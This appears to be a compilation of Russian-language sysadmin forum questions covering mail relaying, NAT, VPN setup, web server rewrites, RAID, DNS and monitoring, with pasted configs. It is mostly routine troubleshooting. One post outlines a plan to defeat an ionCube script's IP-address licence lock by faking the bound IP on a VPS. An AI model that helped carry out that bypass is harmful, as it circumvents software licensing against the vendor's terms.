— 4096 MB PC10600 DDR3 SDRAM — Samsung M378B5273CH0-CH9
— 4096 MB PC10600 DDR3 SDRAM — Samsung M378B5273CH0-CH9
Graphics: nVIDIA GeForce 210 (GT218), 512 MB DDR2 SDRAM
Drive: WDC WD20EARS-00MVWB0, 1953.5 GB, Serial ATA 3Gb/s
Drive: WDC WD20EARS-00MVWB0, 1953.5 GB, Serial ATA 3Gb/s
Drive: WDC WD10EALX-009BA0, 976.8 GB, Serial ATA 6Gb/s
Drive: WDC WD10EALX-009BA0, 976.8 GB, Serial ATA 6Gb/s
Drive: Optiarc DVD RW AD-7260S, DVD+R DL
Drive: Intel Raid 1 Volume, Disk drive
Sound: Intel 5 Series/34x0 Chipset PCH — High Definition Audio Controller [B3]
Sound: nVIDIA GT218 — High Definition Audio Controller
Network: RealTek Semiconductor RTL8168D/8111D PCI-E Gigabit Ethernet Adapter
OS: Microsoft Windows Server 2008 R2 Standard (x64) Build 7601

Intakto

Нужно кинуть витую пару между двумя частными домами на даче. Какой конкретно кабель лучше выбрать для этого? Можно ли его до весны кинуть просто по снегу? Или лучше воздушным образом подвесить?

capt_Rimmer

Товарищи — админы, поделитесь опытом настройки данного чуда или может даже рабочим конфигом.

Есть старый сервер на freebsd 5.4, который рушить нельзя. Нужно его из локальной доставки допилить до релея на другой внутренний сервер.


Вот такой mc имеется:

divert(-1) divert(0) VERSIONID(`$FreeBSD: src/etc/sendmail/freebsd.mc,v 1.28 2003/04/18 01:25:41 gshapiro Exp $') OSTYPE(freebsd5) DOMAIN(generic) FEATURE(access_db, `hash -o -T /etc/mail/access') FEATURE(local_lmtp) FEATURE(virtusertable, `hash -o /etc/mail/virtusertable') FEATURE(accept_unresolvable_domains) FEATURE(use_cw_file) FEATURE(nouucp, `reject') FEATURE(relay_based_on_MX) MASQUERADE_AS(домен.ru) define(`confCW_FILE', `-o /etc/mail/local-host-names') define(`confNO_RCPT_ACTION', `add-to-undisclosed') define(`confPRIVACY_FLAGS', `authwarnings,noexpn,novrfy') define(`confMAX_MESSAGE_SIZE', `10485760')dnl MAILER(local) MAILER(smtp) INPUT_MAIL_FILTER(`sp-milter', `S=local:/var/run/sp-milter.sock, F=T, T=C:1m;S:20s;R:20s;E:1m')


Юзабельно ли следующее решение?:
reki.ru/sendmail_transit_setup.html

KEKSOV

Входные условия.


1. Windows, начиная с XP (если c XP большая проблема, то можно обойтись и без нее)

2. Можно пользоваться только встроенными в ОС средствами

3. Можно пользоваться любым script host-ом не только cmd.exe


Задача.


Есть bat файл вида
@echo off rem Этот файл может запускаться от имени ста пользователей одновременно start /B notepad.exe rem Способ вызова notepad.exe можно изменить на любой другой, лишь бы работало rem В этой строчке нужно узнать PID только что запущенного notepad.exe

shanker

Необходимо удалённо мониторить сервер по сети. Запускать там всякие ГУИшные программки на работу на определённое время, потом смотреть состояние их работы. Возникла идея использовать для этих целей VNC-сервер. И тут возник вопрос какой выбрать. Требование: чтоб он запускался до логина пользователя в систему через GUI. Т.е. стандартный vino отпадает.

Потом стал использовать TihgtVNC. Вроде, то, что нужно. Но в процессе его использования возникла проблема (это относится не только к описанному в вопросе VirtualBox, но и массе других GUI-программ).

В итоге ищу ему замену. Но вот пока не знаю какую выбрать.

serzhb

Здравствуйте!

В последнее время у нас появились жалобы от некоторых клиентов, по поводу того, что наш сайт долго открывается и вообще сам сервис работает очень медленно, ничего нормально не функционирует. При этом остальные сайты открываются быстро. Просили клиентов делать пинги, потерь нет, время отклика в пределах нормы, а вот трассировка немного странная:
grabilla.com/02c0c-2df20ff8-0618-4103-96fb-32c5ae7...


Оказалось всех клиентов с такой проблемой объединяет то, что провайдер у них Yota.


Самое интересное, что на самом деле наш сайт прекрасно открывается ( consultsystems.ru ) и все работает отлично. Попробовали подключить Yota в офисе, у нас все хорошо открывается, без задержек. Поэтому скорее всего проблема на отдельных вышках. Такая ситуация наблюдается не только в Москве, но и, например, в Новосибирске.


Может кто-нибудь сталкивался с подобной проблемой? Нет ли у yota каких-либо ограничений?


Если вы сейчас подключены через Yota, отпишитесь, пожалуйста, насколько хорошо открывается сайт, желательно сделать трассировку. Сервера располагаются на hetzner.de, но мы пробовали делать прокси через московский сервер, все то же самое.


UPD: Отключение keep-alive по всей видимости помогло. Спасибо Antelle за подсказку.

Anisotropic

Задача: запустить скрипт, закодированный ion cube`ом и привязанный к определённому IP адресу.

С конкретным VPS не определился, да и не разбираюсь вообще в VPS в общем-то. В гугле толкового мануала не нашел, всё лабуда вылазит. Думаю купить VPS, воткнуть туда виртуальный сетевой интерфейс с определённым IP адресом, на который привязан скрипт. Ну и, собственно говоря так обойти привязку скрипта к IP адресу.

Возникает вопрос, позволяет ли типичный дешевый VPS, который предлагают хостеры такую манипуляцию?

Caman

Здравствуйте. Подскажите, кто в теме и знает, т.е я не в теме и не знаю.
Арендую простой VDS у FirstVDS и чтобы иметь собственные DNS для доменов дополнительно арендовал
у них IP, получилось так:
ns1.mysite.com / 00.00.00.01
ns2.mysite.com / 00.00.00.02
Все мои домены имеют эти DNS и отлично работают.

Недавно арендовал сервер у Hetzner и необходимо перенести на их сервер все данные.
Перенести файлы и БД я смог просто, воспользовался ISPmanager, все отлично встало, но я без понятия,
как мне поменять DNS для всех сайтов так, чтобы они остались ns1.mysite.com и ns2.mysite.com, при том,
чтобы поменять дочерние DNS только у основного домена mysite.com.
Надеюсь, что я понятно изложил, т.к для меня это пока сложновато.
Т.к мне Hetzner выдал IP, я попросил у них второй в аренду, чтобы сделать по аналогии, как у FirstVDS,
но они мне его не дали.

Подскажите как быть и как правильно сделать?

ChemAli

Есть некоммерческий сайтик на виртуальном хостинге под ддосом, денег на защиту нету. Есть также домашний интернет-канал в 32 мбит/с, который типа может перекрыть своею емкостью атаку.

Насколько идиотская мысль выставить в паблик домашний ip и проксировать с него очищенный трафик на сайт? Проблемы домашнего провайдера интернета сочтем ничтожными.

Цели:
1) спасти сайтик
2) попробовать фильтацию на коленке
3) фан

DmitryAnatolich

Возникла такая проблема: отдали сайт разрабатывать студии, согласившись на то, что хостить его они будут на своем германском сервачке. Дали им доступ к учетке регистратора доменных имен. И они переключили NS-сервера на свои, а мы, соответственно, потеряли доступ к записям. Сайт сдали, все явки-пароли к нему тоже. А NS-ки остались теми же, из хостер-панели записи не меняются.
И теперь за любым DNS-чихом приходится обращаться к ним.
Если ли возможность просмотреть все DNS-записи, насоздавать их же у делегатора (регистратора домена или на том же Яндексе — эм, кто-то так делал? Как оно?) и переписать NS-ки на нужные? Этого будет достаточно?
В вопросе разбираюсь, как вы поняли, не очень. Но отвязаться от этих товарищей хотелось бы.

Ramsei

Есть 3 веб-сервера, каждый расположены в разных местах 1 в России, 2 за бугром, необходима балансировка нагрузки между этими серверами, чтобы в случае отказа 1-го сервера весь трафик переключался на 2й и 3й сервера с минимальной задержкой.


Мне предложили вариант разместить оборудование по типу этого www.f5.com/products/big-ip/big-ip-local-traffic-ma... в каком-либо ДЦ и пустить весь трафик через него и уже на нем делать балансировку, подскажите аналоги такой железки как готового продукта или услуги, по типу амазоновских сервисов, т.к. подобные железки стоят достаточно дорого.


Варианты с балансировкой на уровне DNS не предлагать.

TIEugene

Пусть есть Linux-router.
Пусть есть 3 внешних IP (eth0=EXT_IP0, eth0:1=EXT_IP1, eth0:2=EXT_IP2).
Пусть у него есть внутренний eth1=192.168.0.1.
И пусть есть некий 192.168.0.2 — сервер терминалов.
Задача:
1. прокидывать снаружи с EXT_IP1 порт терминалов на сервер терминалов.
2. но чтобы с последнего наружу трафик (новый) выезжал по EXT_IP2.

Первая часть решена (CentOS6, /etc/sysconfig/iptables):
*nat
-A PREROUTING -i eth0 -d -p tcp --dport 3389 -j DNAT --to-destination 192.168.0.2:3389
*filter
-A FORWARD -i eth0 -m state --state NEW -m tcp -p tcp -d 192.168.0.2 --dport 3389 -j ACCEPT

Маскарад тоже:
-A POSTROUTING -o eth0 -j MASQUERADE

Но выезжают все, ессно, через EXT_IP0.
А надо — через EXT_IP2.

lmaxximl

Windows Server 2008 работает в esxi, время от времени без конкретной периодичности нет возможности войти в систему. Система работает, но после ввода логина/пароля вроде принимает и выбрасывает опять на вход так же Windows Server 2008 как сервер 1С не доступен в сети хотя на шару зайти возможно, помогает только рестарт виртуального хоста. В логах нет ничего. Может кто то с этим встречался?

point212

День добрый.

Решили мы в компании перейти на серьёзные рельсы, чтобы всё «как у взрослых». NAS, SAN, FibreChannel и Hyper-V. Закупили оборудование, собрали, поставили и… упёрлись в проблему.


Если кратко, то проблема в производительности дискового хранилища — она плавает и падает до очень низкой.


Если полно, то читайте далее:

Итак дано:

2 шт NAS IBM DS3512 укомплектованные 12ю дисками SAS 15k на 600Гб каждый, маркированными как IBM (в реале вроде бы произведены Seagate и предназначенными именно для этой модели NAS). Так же в каждый NAS установлено по две (2 шт) карты FibreChannel 8Gbit, на 4 порта каждая. В железяке 2 «головы», имеющих независимый доступ к дискам, и соответственно по карте FC на каждую.

2 шт SAN FibreChannel Switched Fabric IBM SAN24B-5 так же с портами на 8Gbit.

3 шт сервера IBM 3550 M4 7414-F2G. В каждый сервер установлено по FibreChannel карте производства Qlogic на 2 порта 8Gbit. Внутри тоже SAS винты.

Всё фирменное, совместимое, собранное по рекомендациям лучших собаководов и вендоров.


На NAS-ах из всех 12-и винтов собран RAID5 и презентован в SAN. На RAIDе создан 4Тб раздел (GPT, NTFS) и пара разделов поменьше.

На серверах сейчас стоит Windows 2012 Server (180-trial). Драйвера ко всем железкам самые свежие, с офф.сайта IBM.


Для простоты картины будем рассматривать один сервер, один switch, и один NAS. Всё остальное в эксперименте не учавствует.

Тест:

Берём объемный файлик, например 4-8Гб, лежащий на винте сервера. Средствами винды копируем его на раздел, который презентован с NAS-а и наблюдаем эффекты.

1) Первые 1-2-4 секунды копирование идёт со скоростью 300-800Мбайт/сек. Потом плавно или резко падает до 30-60Мбайт/сек и плавно снижается далее. Впрочем иногда успевает на полной скорости скопироваться весь файл.

2) До и после копирования возможно замирание, когда окошко копирования висит и не реагирует на мышь длительностью до 1-20 (иногда больше) секунд. Иногда этого замирания нет.

3) Во время копирования NAS интенсивно мигает лампочками винтов. Когда окошко копирования «висит» — индикаторы активности дисков на NAS не мигают и не горят

4) При попытке удалить свежескопированный на NAS файл, окошко удаления замирает на 20-50 секунд, затем только удаляет файл.

5) Пробовали копировать файл лежащий на NAS на него же, но в другую папку — проблемы аналогичные.

Дисклеймер или «мы уже пробовали»:

— Подключать сервер и NAS напрямую, минуя Switch.

— Оставлять подключенным к NASу один единственный сервер по одному единственному линку.

— Делать всё тоже самое с другим NAS-ом, и другим сервером.

— Ставить Windows Server 2008 R2.

— Делать раздел на хранилище меньшего объема — 500Гб (GPT).


Спецэффекты наблюдаются всё те же.


Что это может быть? Куда смотреть, куда копать?


P/S Простите за терминологию. Мог попутать термины для обозначения железяк, но в целом картина верна.

mongohtotech

Наша DNS зона располагается у российского провайдера. Сегодня у него были проблемы с DNS. Все наши ресурсы оказались недоступны. Это уже второй случай за год.
Как можно организовать отказоустойчивость DNS?
Можно как-то разместить копию DNS зоны у другого провайдера, так что бы в случае падения основного, DNS запросы пошли на резервного?
Может есть другие решения?

kastigar

Есть сетка.
На роутере стоит dnsmasq.
Есть тачка с десктопной убунтой 12.04 в этой сети с hostname kastigar-worktop. До этой машины можно достучаться по хостнейму http://kastigar-worktop:8080/.
Есть ещё одна тачка с серверной убнтой 12.10. С ней есть одна проблема. После wakeup к ней невозможно достучаться по хостнейму. nslookup не видит её. По IP тачка доступна.
Есть подозрение, что за то время пока тачка спит, роутер осовбождает её привязку. И проснувшись убунта не обновляет сетевые настройки по dhcp, а продолжает пользоваться теми что получила первый раз.
Как это можно более-менее корректно пофиксить?
Спасибо за ответы.

P.S. Простите за сумбурную терминологию

junqed

Сделал я проект, написал fabric-скрипты для деплоя. Но никак не могу понять, под каким пользователем fabric должен запускать команды, чтобы не было проблем с правами. Кто что делает в этом случае? Есть вариант с sudo, но может есть какой-то другой способ?

Andrewww

Есть необходимость окунуться в работу протоколов HTTP и SNMP в Linux. Хочется не простой сухой теории из RFC и man, а что то такое, что сразу можно было бы тут же опробовать на практике, с примерами, желательно с привязкой с Apache и Nagios и/или Cacti и/или Munin. Хотя бы на уровне базового администрирования и решения бытовых задач сисадмина. Чтобы можно было администрировать и понимать в общем виде что оно такое и с чем его едят.
Потому прошу подсказать каких то ссылок на ресурсы с хорошим материалом. Больше хотелось бы каких-то туториалов, гайдов и хау-тушек. Язык желательно русский, ну или не сильно выкрученный английский.

stronciy

Перерыл все сеть, но так и не смог найти ответ на проблему.


Есть сервер у хетцнера, на нем стоит proxmox 2

Соответственно как у хетцнера заведено есть главный IP 188.xxx.xxx.15 и есть подсеть 178.xxx.xxx.xxx/29 на нем живет виртуалка на ней хосты все работает отлично кроме… почты!


То есть когда с любого домена виртуалки отправляет почту, то вместо родного IP виртуалки доходит главный IP сервера!!!

И если гугл хоть и ругается

Received-SPF: softfail (google.com: domain of transitioning xxx@xxx.xx does not designate 188.xxx.xxx.15 as permitted sender)

но все же принимает почту, то многие вообще не хотят принимать почту ни в каком виде :( естественно думая что им отправляют спам.


Вопрос, как такое может быть!

И как это можно исправить ?!


Заранее благодарен за помощь.

ProRunner

Проблема решилась использованием этого скрипта специально для настройки на aws.

Без проблем настроил PPTP VPN на облаке Амазона — всё работает.
Сейчас пытаюсь настроить IPSEC/L2TP подключение по этому топику (потом нашёл ещё одну инструкцию)

Сначала при попытку перезагрузить настройки консоль мне писала (с пустой строкой на месте ошибки):

Segmentation fault (core dumped) failed to start openswan IKE daemon - the following error occured: Опытным путём выяснилось, что причина в строке rightprotoport=17/%any в /etc/ipsec.conf. Заменил её на rightprotoport=17/0 (понятия не имею, что это значит). Перезагрузка настроек стала проходить без ошибок. Поменял обратно, магия, но все работает. Возможна причина была в отсутствии перевода строки в файле конфигурации. В общем, уже неважно.

sudo ipsec verify сейчас пишет:

Checking your system to see if IPsec got installed and started correctly: Version check and ipsec on-path [OK] Linux Openswan U2.6.37/K3.2.0-31-virtual (netkey) Checking for IPsec support in kernel [OK] SAref kernel support [N/A] NETKEY: Testing XFRM related proc values [OK] [OK] [OK] Checking that pluto is running [OK] Pluto listening for IKE on udp 500 [OK] Pluto listening for NAT-T on udp 4500 [OK] Checking for 'ip' command [OK] Checking /bin/sh is not /bin/dash [WARNING] Checking for 'iptables' command [OK] Opportunistic Encryption Support [DISABLED]

Вроде всё должно работать, но попытки подключиться не удаются. Win7 пишет: «Ошибка 789. Попытка L2TP-подключения не удалась из-за ошибки, произошедшей на уровне безопасности во время согласований с удаленным компьютером».
Айфон подключиться тоже не может.

Вот файлы настроек (собранные уже откуда только можно):

/etc/rc.local
for vpn in /proc/sys/net/ipv4/conf/*; do echo 0 > $vpn/accept_redirects; echo 0 > $vpn/send_redirects; done iptables --table nat --append POSTROUTING --jump MASQUERADE exit 0

/etc/ipsec.conf
config setup dumpdir=/var/run/pluto/ nat_traversal=yes virtual_private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12,%v6:fd00::/8,%v6:fe80::/10 protostack=netkey conn L2TP-PSK-NAT rightsubnet=vhost:%priv also=L2TP-PSK-noNAT conn L2TP-PSK-noNAT authby=secret pfs=no auto=add keyingtries=3 ikelifetime=8h keylife=1h type=transport left=ELASTIC IP ADDRESS leftprotoport=17/1701 right=%any rightprotoport=17/0

/etc/ipsec.secret
ELASTIC IP %any: PSK "Passphrase"

/etc/xl2tpd/xl2tpd.conf
[global] ipsec saref = yes listen-addr = ELASTIC IP port = 1701 ; * Bind to port 1701 auth file = /etc/ppp/chap-secrets ; * Where our challenge secrets are [lns default] ip range = 172.16.1.30-172.16.1.100 ; ip range = range of IPs to give to the connecting clients local ip = 172.16.1.1 refuse pap = yes require authentication = yes ppp debug = no ; yes for testing pppoptfile = /etc/ppp/options.xl2tpd length bit = yes

/etc/ppp/options.xl2tpd
require-mschap-v2 ms-dns 8.8.8.8 ms-dns 8.8.4.4 asyncmap 0 auth mtu 1200 mru 1000 crtscts hide-password modem name l2tpd proxyarp lcp-echo-interval 30 lcp-echo-failure 4 noipx

/etc/ppp/chap-secrets
user1 pptpd Pass * user2 l2tpd Pass *

Вроде бы всё. У кого-то есть идеи, в чем причина того, что всё это не работает?
А, да, в security group для инстанса открыты все tcp и udp порты на время экспериментов. Ubuntu 64 битная.

Вот что пишет auth.log о попытке подключения:
Скрытый текстDec 21 20:26:00 (instance local ip) pluto[5222]: packet from (my ip):500: ignoring Vendor ID payload [MS NT5 ISAKMPOAKLEY 00000008] Dec 21 20:26:00 (instance local ip) pluto[5222]: packet from (my ip):500: received Vendor ID payload [RFC 3947] method set to=109 Dec 21 20:26:00 (instance local ip) pluto[5222]: packet from (my ip):500: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-02_n] meth=106, but already using method 109 Dec 21 20:26:00 (instance local ip) pluto[5222]: packet from (my ip):500: ignoring Vendor ID payload [FRAGMENTATION] Dec 21 20:26:00 (instance local ip) pluto[5222]: packet from (my ip):500: ignoring Vendor ID payload [MS-Negotiation Discovery Capable] Dec 21 20:26:00 (instance local ip) pluto[5222]: packet from (my ip):500: ignoring Vendor ID payload [Vid-Initial-Contact] Dec 21 20:26:00 (instance local ip) pluto[5222]: packet from (my ip):500: ignoring Vendor ID payload [IKE CGA version 1] Dec 21 20:26:00 (instance local ip) pluto[5222]: packet from (my ip):500: initial Main Mode message received on (instance local ip):500 but no connection has been authorized with policy=PSK

5nook

Нужно помощь, уже все выходные потратил на гугление вот по таким вопросам.


Нужно научить сайт работать по таким правилам, которые прописаны через htaccess (это самый оптимальный вариант)


#1

Вместо
site.ru/page.html/

Редирект на
site.ru/page.html


#2

Вместо
site.ru/catalog

Редирект на
site.ru/catalog/


#3

Вместо
site.ru//catalog//

Редирект на
site.ru/catalog/


#4

Вместо
site.ru/index/

Редирект на
site.ru/


#5

Вместо
site.ru/blog/name-blog/page1/

Редирект на
site.ru/blog/name-blog/


PS понимаю что много прошу, с меня на пиво!


PSPS Кстати правило #2 все таки сделал
RewriteCond %{REQUEST_URI} /+[^\.]+$ RewriteRule ^(.+[^/])$ %{REQUEST_URI}/ [R=301,L]

CarpeDiem

Всем хабрапривет! Сегодня столкнулся с проблемой, опыта в серверном администрировании немного, потому решил обратиться за помощью к сообществу :)

Итак. Есть две папки, example и redmine, лежащие на одном уровне иерархии файловой системы (/var/www). Одна из папок (example) установлена в качестве DocumentRoot для виртуального хоста в Apache2 и доступна через интернет: example.org

Задача: нужно прописать рерайт так чтобы при заходе на example.org/redmine сервер обращался к папке /var/www/redmine

Директива Alias не сработала:



ServerAdmin mymail@gmail.com
ServerName www.example.org
ServerAlias example.org *.example.org
DocumentRoot /var/example

Alias /redmine/ "/var/www/redmine/"


AllowOverride all
Options -MultiViews
RailsBaseURI /redmine
PassengerResolveSymlinksInDocumentRoot on



Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all




Пробовал по этому совету в папке example создавать папку redmine, а в ней делать символьную ссылку на /var/www/redmine/public:
ln -s /var/www/redmine/public /var/www/example/redmine
Не помогло.

При заходе на example.org/redmine в показанной выше конфигурации выдается ошибка Passenger, «No such file or directory — config/environment.rb» — т.е. он не видит правильный путь для запуска.

Сложность похоже еще в том, что Redmine — Ruby приложение, а для него обязательно прописывать особые директивы. Например RailsBaseURI, которое по-видимому отсчитывается относительно директивы DocumentRoot.

Please help :)

gigigi

Здравствуйте.

Получилось так, что я накосячил при переносе базы с одного сервера на другой, и перенёс её вместе с базой mysql.

После чего я обнаружил, что я не могу даже рестартануть mysql, т.к. у пользователя debian-sys-maint нет на это прав, но это не суть, как эту проблему решить потом, я уже нашёл.


Дело в том, что пользователь root у меня почему-то без GRANT. Т.е. он может делать всё, но не может создать например нового юзера.
mysql -uroot -p
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 900 Server version: 5.5.28-1~dotdeb.0 (Debian)
GRANT ALL PRIVILEGES ON *.* TO 'debian-sys-maint'@'localhost' IDENTIFIED BY '...' WITH GRANT OPTION;
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)


Вот и всё. Получается, что у моего root-пользователя нет прав на создание пользователей и назначение прав.

Помогите пожалуйста наделить рута правами)

Заранее спасибо!

Hile

Здраствуй Хабр, есть проблема.


Поставил WSUS на 2008 R2 64-Bit.


Через GPO накатил политику указывающую клиентам брать с него апдейты, но!


Клиент видит лишь малую долю обновлений (около 10-ка ) хотя в самом WSUS на этого клиента висит 150+ обновлений. Винду только что поставил WSUS тоже, от версии не зависит что XP что W7 — ситуация схожа. Все обновления одобрены.

Jons

Недавно, возможно даже на хабре, видел описание веб-сервиса с возможностью мониторинга нескольких никс-серверов (мониторинг mysql, i/o, места на диске), причем часть функционала дают бесплатно, с няшным интерфейсом похожим чем-то на медиатемпл. Хотел «пожже попробовать», но напрочь забыл название/сайт. Час поисков и гугленья успехом не увенчались. Подскажите?

Terotgut

Добрый день!
Не нашел подобного вопроса, хотя уверен что он уже задавался.

На домашнем компе есть данные объёмом около террабайта, для которых нужно настроить бэкапы. Принципиально, чтобы они хранились в «удаленном» месте — то есть самый просто вариант — настроить локальные бэкапы не подходит.

Родственников, которые бы согласились держать постоянно включенный комп тоже не нашлось.
А вручную подцеплять диск, делать бэкап и утаскивать его из дома несколько раз в месяц — не удобно.

В голову приходит только аренда выделенного сервера. Дешевле 3к в месяц я ничего не нашел ( принципиален объем в 1тб+), а для домашних бэкапов это многовато

Просьба подсказать другой метод или хостинг с более приемлемыми ценами

danielnewman

Произошла странная штука, ссылки кнопок Share и Send to виджетов facebook сайтов стали переписываться на https. Так как наши сертефикаты SSL самоподписные, имеем нехороший вид для пользователей и теряем аудиторию.


Вот тут пример того, как предлагается решить проблему, но редирект не происходит.


Более того, в конфигурации вида

server { listen 443 ssl; rewrite ^(.*) http://$host$1 permanent; # ssl on; ssl_certificate /etc/nginx/conf.d/server.crt; ssl_certificate_key /etc/nginx/conf.d/server.key; ....

сервер вообще отказывается иметь с посетителем дело. Дескать нужен включенный SSL. Включение SSL приводит к началу проблемы. Принятие «паленого» самоподписного сертификаты приводит к желаемому редиректу на HTTP.


Как сделать редирект до предоставления сертификатов?

zeksa

В рамках курсовой работы написал простой сервер на С++ и OpenCV, который позволяет стримить видеопоток с веб-камеры в браузер. Видеопоток в формате .ogg, кодек Theora. Браузер всё добро отображает с помощью HTML5 — обычная страничка с тегом video.
Сервер с помощью OpenCV захватывает кадры с камеры и через кодек пишет их в файл, собственно стриминг в браузер идёт уже с файла.
Из-за неравномерного размера кадров при записи их с файла в буфер передачи через сокет возникает момент, когда браузер начинает проводить буфферизацию и не может дальше автоматически продолжить воспроизведение потока.
Вопрос: есть ли какие-то методы заставить браузер продолжить воспроизведение?

erthad

Посоветуйте, пожалуйста, легковесный мониторинг HTTP.
Нужно мониторить несколько HTTP-локаций (HTML/JSON/XML/etc) и выводить это все красиво на одной странице.
Не SaaS.

Основной критерий — чтобы настраивался на мониторинг 2-3 локаций с нуля не больше чем за полчаса (без предварительного знакомства с этой программой).

Желательно, но не обязательно, и не в ущерб основному вышеприведенному критерию:
Возможность проверять ответы на POST-запросы. Проверка на возвращаемый определенный статус-код HTTP, а не просто 200/не200 (400,401,403,404,409,500 используются точно и хочется их различать). Небольшое количество фич — плюс. Или как вариант небольшое количество по-умолчанию включенных фич.

Уточню зачем это нужно: времени на настройку нормального мониторинга пока нет, но какой-то минимум (работает/неработает) хочется отслеживать уже сейчас.

iLexx_13

Доброго времени суток, хабровчане.
По мотивам стетей захотелось спросить про ответственность приходящего сисадмина.
«Мой знакомый» неофициально работает админом в небольшой фирме. Большинство компьютеров на убунту, Win2k3Server + 1C — лицензии. Еще есть несколько win-машин, на некоторых есть лицензия и в качестве офиса — OOo. Но есть такие, которые достались в наследство, т.е. может и легально куплено, а может и так поставлено, ну и офис от MS аналогично.

Так вот вопрос, что будет админу такому в случае проверки?
За зп админ расписывается, я так понял на внутренних бланках (в смысле, для отчета перед руководством).

Еще раз — официального трудоустройства нет, но сотрудники знают кто и чем занимается.

Спасибо.

P.S. Все происходит в РФ.

ReanGD

Собственно хочется простого — иметь кроосплатформенный фреймворк для тестирования приложений(python) на виртуальных машинах.

В идеале список требований к нему такой:
— запуск виртуалки (в частности vmware, но не отказался бы от чего-то более универсального)
— загрузка туда новой версии приложения/настройка окружения/выгрузка результатов
— погонять тесты, с возможностью потом централизованно посмотреть результаты
— очень хочется иметь возможность автоматически поработать с GUI + поснимать скриншоты

Google в ответ на такие запросы крутит у виска и выдает какой-то дикий зоопарк узкоспециализированных и зачастую не кроссплатформенных решений, выбрать набор стоящих сложно, разбираться с каждым в отдельности не хочется. В принципе на том же python можно было бы написать упрощенную версию чего-то подобного самому, но боюсь уж очень трудозатратно получится. Надеюсь Хабраразум подскажет стоящее решение.

Заранее большое спасибо.

Nigrimmist

Добрый день. Посоветуйте пожалуйста утилиту, которая смогла бы на win сервере мониторить определенные папки и результаты кидать в лог/на емейл.

bigazzzz

Это мой первый сервер с raid, потому сильно не ругайте.

Пришел R-Style Marshall с 5 дисками из которых 4 было объединено в 10-й рэйд, а 5 был оставлен под hot spare. Все сделано было с помощью встроенной утилиты. Причем в ней VD0 уже был видел. Идем дальше и после загрузки bios VD0 уже не виден.

Решил сделать check consistency в той же утилите, но этот чек занимает огромное количество времени.

Созрели вопросы

1. Нужно ли вообще делать это при первоначальном создании рэйда?

2. Без последствий можно прервать этот процесс?

3. Может я просто что-то недонастроил в bios?

syncer

Через некоторое время просто отключается инициатор (делает log off из таргет)
кто нибудь встрачался с такой проблемой?

Hassium

Приветствую сообщество.
Если кратко, средних параметров сервер, в нём ~30 сайтов + бэкапы, в основном modx, и расово верные дополнения.

До Н.Г. всё было ок, 1го числа было падение, затем 2го -3го висело вплоть до 8 в промежутках. Грешил сначала на ддос, служба поддержки позже начала втирать о превышеных лимитах на диск. квоту, память и т.д. Просят взять другой более дорогой тариф…

Я смотрел в ssh вроде всё ок, и поэтому мучают сомнения в чем может быть причина и как установить какой сайт именно грузит сервер? Прошлую тему habrahabr.ru/qa/3348/ прочел и испробовал.

Еще варианты?

shanker

Дано: сервер на Ubuntu 12.04.

Необходимо удалённо работать с его GUI программами так, чтобы на реальном его рабочем столе это не отображалось.
Проброс иксов через SSH не подходит — тормознуто и при отваливании SSH и программа, запущенная через SSH убивается. Необходимо, чтоб при удалённом запуске программы продолжали работать.

Использовал tightvnc — он идеально подходил, создавал копию рабочего стола и не требовал автологина пользователя (vino, например, запускается только после логина в систему через иксы). Я просто удалённо по ssh запускал сервер, он создавал копию рабочего стола и я мог работать, завершать SSH соединение и подключаться к созданному VNC серверу. Но у него есть баг — периодически отваливается сам VNC сервер. Вот, ищу ему замену.

Пытался разобраться с xvnc4server по этому мануалу. Но вместо рабочего стола видел серый квадрат

Kolger

Приветствую!

В данный момент у меня под управлением порядка 15ти серверов (большая часть из них это виртуалки) и их количество постоянно увеличивается. Я стараюсь делать разные пароли на root и ключевые сервисы (типа mysql) для каждого из них. Итого, получается 5-6 паролей на сервер. Сам логинюсь по ключу.

Базу данных паролей я храню в 1password, что меня вполне устраивает, но я, предлолагаю, что можно сделать лучше и удобнее.

Как и где вы храните пароли от серверов? Как это делают компании типа Яндекса? Наверняка есть некое универсальное решение.

Заранее спасибо за ответ.

rinx

всем привет!


Есть задача организовать wifi-Hotspot для гостей для доступа в Интернет. Сеть будем иметь открытая, без ключа. Основное требование — пускать в Интернет по логину-паролю или по ваучеру, который должен будет генерироваться секретарём или администратором каждый раз когда нужен доступ.

В бюджете нет больших ограничений, но хочется построить правильное, бюджетное и стабильное решение, так как решение требуется для малого бизнеса.


Пока нашёл следующие решения:


0. UniFi 2.0 Хотспот для кафе и гостиниц. habrahabr.ru/company/comptek/blog/125876/


1. Wifi HotSpot на основе Pfsense.
ru.doc.pfsense.org/index.php/%D0%A3%D1%81%D1%82%D0...(pfSense_2.x)


2. Wifi HotSpot на основе ZyXEL ZyAIR B-4000. www.thg.ru/network/200310171/zyxel-11.html


3. Wifi Hotspot на основе оборуддования D-Link. d-link.ua/wireless_solutions_4


Есть ли ещё какие-то интересные решения, которые вы знаете или применяли?

Смотрел на DD-WRT, но что-то не нашёл внятного описания — может кто-нибудь поделиться?


так же вопрос — какие порекомендуете использовать точки доступа? PoE?


Любые советы и опыт приветствуются!

uksus

Коллеги, подскажите хорошие книги, которые будут полезны администратору Windows. Благодарю.

vgray

У меня есть несколько различных систем мониторинга, часть самописные, часть это munin — все системы умеют вызывать внешную комманду при проблемах.


Сейчас при проблемах они все отсылают email, однако если вылетел диск и проверка идет каждые 5 минут, то я каждые 5 минут буду получать письмо.


Менять все системы на одну большую и хорошую ( заббикс) я не хочу( не могу) из-за трудо затрат. Может кто видел, скрипт(демон, сервис) на вход которого передаются все события, настраиваются правила уведомления.


Хочется, чтобы администратор получал не 60 писем в час ( если проверка идет каждую минуту), а первое письмо, потом еще одно письмо через 20 минут, потом еще письмо через час, потом письмо через 4 часа.

Ingtar

Добрый день!
Ситуация в следующем:
Есть windows server 2008R2 (в рабочей группе), там установлен бухгалтерский софт. Туда подключаются люди по RDP, работают с ним, делают выгрузки в файл. Файл выгружается на локальный диск этого сервера, который у клиентов подключен как сетевой (\\IPaddress\d$ )
Иногда возникает странная ситуация — выгрузка закончена, файлик виден на самом сервере, но на клиентах его нет! Файл не большой, 3-4 КБ, поэтому если он выгрузился- значит выгрузился.
На клиентах (семерка и может быть XP, надо будет уточнить) этот файлик в подключенной папке становится виден ну минут через 5-10… Глюк плавающий, четкого повторения добиться не удалось. Бухгалтера уже смирились с таким глюком, но все равно иногда начинают меня терзать на предмет «почему так» :)
